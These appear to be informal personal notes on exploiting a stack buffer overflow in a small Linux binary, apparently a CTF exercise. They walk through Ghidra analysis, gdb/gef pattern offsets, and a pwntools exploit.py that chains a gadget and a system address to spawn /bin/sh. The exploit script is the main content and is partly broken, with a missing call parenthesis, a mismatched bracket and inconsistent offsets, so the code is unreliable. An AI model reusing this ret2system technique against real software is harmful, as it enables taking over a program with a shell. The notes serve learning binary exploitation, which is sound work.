if you can download the app from sites, we can analyze them on kali!

Tool: Ghidra

New project> non-share > set a project name > Tool chest (dragon icon) > import the file.

And analyze!

• look into functions > main and see what it's doing

local_128

gets(local_78)

puts(local_78)

• gets and puts are vulnerable.

Try to run the app

• make it executable with chmod +x

• gdb ./myapp

• download gef

• python -c 'print "A"*112' (copy the output and paste it into the app command to test the BOF)

Does it make the app crush?

patten create 200

run with "r" command

look at registers with "registers"

You can search patten with

pattern search $rsp

create another patten with

python -c 'print "A"*120 + "B"*8 + "C"*8'

To see exactly where we see the B

From Ghidra, copy the memory address of the main function.

create a simple exploit.py

from pwn import *
context(terminal=['tmux', 'new-window'])
p= gdb.debug('./myapp', 'b main')
context(os='linux', arch='amd64')

junk = ("A" * 112).encode
bin_sh = "/bin/sh\x00".encode()
system = p64(0x40116e) # put system address
pop_r13 = p64(0x401206)
null = p64(0x0)
test = p64(0x401152(

p.recvuntil('What do you want me to echo back?')
p.sendline(junk + bin_sh + pop_r13 + system + null + null + test) 
p.interactive()

-finding system address

objdump -D myapp | grep -i system